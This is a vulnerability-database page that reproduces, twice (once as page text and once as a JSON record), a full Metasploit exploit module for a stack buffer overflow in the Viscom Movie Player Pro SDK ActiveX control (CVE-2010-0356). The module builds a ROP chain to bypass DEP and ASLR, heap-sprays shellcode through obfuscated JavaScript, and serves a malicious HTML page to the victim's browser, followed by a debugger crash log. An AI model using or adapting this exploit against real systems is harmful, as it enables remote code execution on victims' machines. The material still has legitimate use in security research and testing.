Search...

Viscom Software Movie Player Pro SDK ActiveX 6.8

2011-11-19T00:00:00

ID 1337DAY-ID-16838
Type zdt
Reporter metasploit
Modified 2011-11-19T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
    Rank = NormalRanking
 
    include Msf::Exploit::Remote::HttpServer::HTML
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           =&gt; 'Viscom Software Movie Player Pro SDK ActiveX 6.8',
            'Description'    =&gt; %q{
                    Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control
                in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows
                remote attackers to execute arbitrary code via a long strFontName parameter to the
                DrawText method.
 
                The victim will first be required to trust the publisher Viscom Software.
                This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7
                with Java support.
            },
            'License'        =&gt; MSF_LICENSE,
            'Author'         =&gt;
                [
                    'shinnai', # Vulnerability discovery and original exploit
                    'TecR0c',  # Metasploit module
                    'mr_me'    # Metasploit module
                ],
            'Version'        =&gt; '$Revision: $',
            'References'     =&gt;
                [
                    [ 'CVE', '2010-0356' ],
                    [ 'OSVDB', '61634' ],
                    [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],
                ],
            'DefaultOptions' =&gt;
                {
                    'EXITFUNC' =&gt; 'process',
                    'DisablePayloadHandler' =&gt; 'false',
                    'InitialAutoRunScript' =&gt; 'migrate -f'
                },
            'Payload'        =&gt;
                {
                    'Space'    =&gt; 1024,
                    'BadChars' =&gt; "\x00"
                },
            'Platform'       =&gt; 'win',
            'Targets'        =&gt;
                [
                    [ 'Automatic', {} ],
                    [ 'Windows IE6-7', {} ],
                    [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]
                ],
            'DisclosureDate' =&gt; 'Jan 12 2010',
            'DefaultTarget'  =&gt; 0))
 
        register_options(
            [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
    end
 
    # Prevent module from being executed in autopwn
    def autofilter
        false
    end
 
    def check_dependencies
        use_zlib
    end
 
    def junk(n=4)
        return rand_text_alpha(n).unpack("L")[0].to_i
    end
 
    def on_request_uri(cli, request)
 
        # Set target manually or automatically
        my_target = target
        if my_target.name == 'Automatic'
            agent = request.headers['User-Agent']
            if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
                my_target = targets[1] # XP
            elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
                my_target = targets[1] # XP
            elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
                my_target = targets[2] # XP
            elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
                my_target = targets[1] # Vista
            elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8\.0/
                my_target = targets[2] # Vista
            elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
                my_target = targets[2] # Win7
            end
        end
 
        sploit = rand_text_alpha(32)
 
        pivot_addr = 0x1126cfe4
 
        if my_target.name =~ /IE8/
 
            pivot_rop =
            [ # Pivot to get to ROP Chain
                0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
                pivot_addr,
                0x10014361, # MOV ESP,EBP # POP EBP # RETN 08    ** [MOVIEP~1.OCX]
                junk, # ---------------------^
                junk, # ----------------------^
                junk, # ----------------------^
                junk, # -------------------------------------^
                junk, # -------------------------------------^
                0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]
            ].pack("V*")
 
            sploit &lt;&lt; pivot_rop
 
            code = [0x7C347F98].pack("V") * 4 # RETN (ROP NOP) [MSVCR71.dll]
 
            code &lt;&lt;
            [ # MSVCR71.dll - rop chain generated with mona.py
                0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
                0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)
                0x7C347F98, # RETN (ROP NOP)
                0x7C3415A2, # JMP [EAX]
                0xFFFFFFFF, #
                0x7C376402, # Skip 4 bytes
                0x7C351E05, # NEG EAX # RETN
                0x7C345255, # INC EBX # FPATAN # RETN
                0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
                0x7C344F87, # POP EDX # RETN
                0xFFFFFFC0, # Value to negate, will become 0x00000040
                0x7C351EB1, # NEG EDX # RETN
                0x7C34D201, # POP ECX # RETN
                0x7C38B001, # &Writable location
                0x7C347F97, # POP EAX # RETN
                0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF
                0x7C378C81, # PUSHAD # ADD AL,0EF # RETN
                0x7C345C30, # Ptr to 'push esp' # ret
            ].pack("V*")
 
            code &lt;&lt; payload.encoded
        else
            code = payload.encoded
            sploit &lt;&lt; [pivot_addr].pack('V*')
        end
 
        # Payload in JS format
        code = Rex::Text.to_unescape(code)
 
        spray = &lt;&lt;-JS
        var heap_lib = new heapLib.ie(0x20000);
        var code = unescape("#{code}");
        var nops = unescape("%u0c0c%u0c0c");
 
        while (nops.length &lt; 0x2000) nops += nops;
        var offset = nops.substring(0, 0x800-0x20);
        var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);
 
        while (shellcode.length &lt; 0x40000) shellcode += shellcode;
        var block = shellcode.substring(0, (0x7fb00-6)/2);
 
        heap_lib.gc();
 
        for (var i = 0; i &lt; 0x200; i++) {
        heap_lib.alloc(block);
        }
        JS
 
        # Use heaplib
        js = heaplib(spray)
 
        # Obfuscate on demand
        if datastore['OBFUSCATE']
            js = ::Rex::Exploitation::JSObfu.new(js)
            js.obfuscate
        end
 
        # Randomize the javascript variable names
        vname = rand_text_alpha(rand(100) + 1)
        strname = rand_text_alpha(rand(100) + 1)
 
        html = %Q|&lt;html&gt;
&lt;object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'&gt;&lt;/object&gt;
&lt;script&gt;#{js}&lt;/script&gt;
&lt;script language='vbscript'&gt;
 
#{strname} = "#{sploit}"
 
#{vname}.DrawText 1, 1, 1, "", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1
 
&lt;/script&gt;
&lt;/html&gt;
|
        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 
        # Transmit the response to the client
        send_response_html(cli, html)
    end
 
end
=begin
(78c.1d8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4
eip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???
 
0:005&gt; dd @esp
0203f300  41414141 41414141 41414141 41414141
0203f310  41414141 41414141 41414141 41414141
0203f320  41414141 41414141 41414141 41414141
0203f330  41414141 41414141 41414141 41414141
0203f340  41414141 41414141 41414141 41414141
0203f350  41414141 41414141 41414141 41414141
0203f360  41414141 41414141 41414141 41414141
0203f370  41414141 41414141 41414141 41414141
=end



#  0day.today [2018-04-10]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-16838", "lastseen": "2018-04-10T04:24:25", "viewCount": 3, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-10T04:24:25", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-10T04:24:25", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16838", "description": "Exploit for windows platform in category remote exploits", "title": "Viscom Software Movie Player Pro SDK ActiveX 6.8", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Viscom Software Movie Player Pro SDK ActiveX 6.8',\r\n 'Description' => %q{\r\n Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\r\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\r\n remote attackers to execute arbitrary code via a long strFontName parameter to the\r\n DrawText method.\r\n \r\n The victim will first be required to trust the publisher Viscom Software.\r\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\r\n with Java support.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'shinnai', # Vulnerability discovery and original exploit\r\n 'TecR0c', # Metasploit module\r\n 'mr_me' # Metasploit module\r\n ],\r\n 'Version' => '$Revision: $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2010-0356' ],\r\n [ 'OSVDB', '61634' ],\r\n [ 'URL', 'http://www.exploit-db.com/exploits/12320/' ],\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 'process',\r\n 'DisablePayloadHandler' => 'false',\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ],\r\n [ 'Windows IE6-7', {} ],\r\n [ 'Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)', {} ]\r\n ],\r\n 'DisclosureDate' => 'Jan 12 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)\r\n end\r\n \r\n # Prevent module from being executed in autopwn\r\n def autofilter\r\n false\r\n end\r\n \r\n def check_dependencies\r\n use_zlib\r\n end\r\n \r\n def junk(n=4)\r\n return rand_text_alpha(n).unpack(\"L\")[0].to_i\r\n end\r\n \r\n def on_request_uri(cli, request)\r\n \r\n # Set target manually or automatically\r\n my_target = target\r\n if my_target.name == 'Automatic'\r\n agent = request.headers['User-Agent']\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # XP\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # XP\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7\\.0/\r\n my_target = targets[1] # Vista\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Vista\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 8\\.0/\r\n my_target = targets[2] # Win7\r\n end\r\n end\r\n \r\n sploit = rand_text_alpha(32)\r\n \r\n pivot_addr = 0x1126cfe4\r\n \r\n if my_target.name =~ /IE8/\r\n \r\n pivot_rop =\r\n [ # Pivot to get to ROP Chain\r\n 0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]\r\n pivot_addr,\r\n 0x10014361, # MOV ESP,EBP # POP EBP # RETN 08 ** [MOVIEP~1.OCX]\r\n junk, # ---------------------^\r\n junk, # ----------------------^\r\n junk, # ----------------------^\r\n junk, # -------------------------------------^\r\n junk, # -------------------------------------^\r\n 0x1001c049, # RETN (ROP NOP) [MOVIEP~1.OCX]\r\n ].pack(\"V*\")\r\n \r\n sploit << pivot_rop\r\n \r\n code = [0x7C347F98].pack(\"V\") * 4 # RETN (ROP NOP) [MSVCR71.dll]\r\n \r\n code <<\r\n [ # MSVCR71.dll - rop chain generated with mona.py\r\n 0x7C37653D, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN\r\n 0xFFFFFDFF, # Value to negate, will become 0x00000201 (dwSize)\r\n 0x7C347F98, # RETN (ROP NOP)\r\n 0x7C3415A2, # JMP [EAX]\r\n 0xFFFFFFFF, #\r\n 0x7C376402, # Skip 4 bytes\r\n 0x7C351E05, # NEG EAX # RETN\r\n 0x7C345255, # INC EBX # FPATAN # RETN\r\n 0x7C352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN\r\n 0x7C344F87, # POP EDX # RETN\r\n 0xFFFFFFC0, # Value to negate, will become 0x00000040\r\n 0x7C351EB1, # NEG EDX # RETN\r\n 0x7C34D201, # POP ECX # RETN\r\n 0x7C38B001, # &Writable location\r\n 0x7C347F97, # POP EAX # RETN\r\n 0x7C37A151, # Ptr to &VirtualProtect() - 0x0EF\r\n 0x7C378C81, # PUSHAD # ADD AL,0EF # RETN\r\n 0x7C345C30, # Ptr to 'push esp' # ret\r\n ].pack(\"V*\")\r\n \r\n code << payload.encoded\r\n else\r\n code = payload.encoded\r\n sploit << [pivot_addr].pack('V*')\r\n end\r\n \r\n # Payload in JS format\r\n code = Rex::Text.to_unescape(code)\r\n \r\n spray = <<-JS\r\n var heap_lib = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{code}\");\r\n var nops = unescape(\"%u0c0c%u0c0c\");\r\n \r\n while (nops.length < 0x2000) nops += nops;\r\n var offset = nops.substring(0, 0x800-0x20);\r\n var shellcode = offset + code + nops.substring(0, 0x2000-offset.length-code.length);\r\n \r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x7fb00-6)/2);\r\n \r\n heap_lib.gc();\r\n \r\n for (var i = 0; i < 0x200; i++) {\r\n heap_lib.alloc(block);\r\n }\r\n JS\r\n \r\n # Use heaplib\r\n js = heaplib(spray)\r\n \r\n # Obfuscate on demand\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n \r\n # Randomize the javascript variable names\r\n vname = rand_text_alpha(rand(100) + 1)\r\n strname = rand_text_alpha(rand(100) + 1)\r\n \r\n html = %Q|<html>\r\n<object classid='clsid:F4A32EAF-F30D-466D-BEC8-F4ED86CAF84E' id='#{vname}'></object>\r\n<script>#{js}</script>\r\n<script language='vbscript'>\r\n \r\n#{strname} = \"#{sploit}\"\r\n \r\n#{vname}.DrawText 1, 1, 1, \"\", 1, #{strname}, True, True, True, 1, 1, 1, 1, 1, 1\r\n \r\n</script>\r\n</html>\r\n|\r\n print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n \r\n # Transmit the response to the client\r\n send_response_html(cli, html)\r\n end\r\n \r\nend\r\n=begin\r\n(78c.1d8): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=000079f3 ebx=00000000 ecx=0203f298 edx=7c90e4f4 esi=008de5c0 edi=0287f2f4\r\neip=41414141 esp=0203f300 ebp=0203f4a0 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n41414141 ?? ???\r\n \r\n0:005> dd @esp\r\n0203f300 41414141 41414141 41414141 41414141\r\n0203f310 41414141 41414141 41414141 41414141\r\n0203f320 41414141 41414141 41414141 41414141\r\n0203f330 41414141 41414141 41414141 41414141\r\n0203f340 41414141 41414141 41414141 41414141\r\n0203f350 41414141 41414141 41414141 41414141\r\n0203f360 41414141 41414141 41414141 41414141\r\n0203f370 41414141 41414141 41414141 41414141\r\n=end\r\n\r\n\n\n# 0day.today [2018-04-10] #", "published": "2011-11-19T00:00:00", "references": [], "reporter": "metasploit", "modified": "2011-11-19T00:00:00", "href": "https://0day.today/exploit/description/16838"}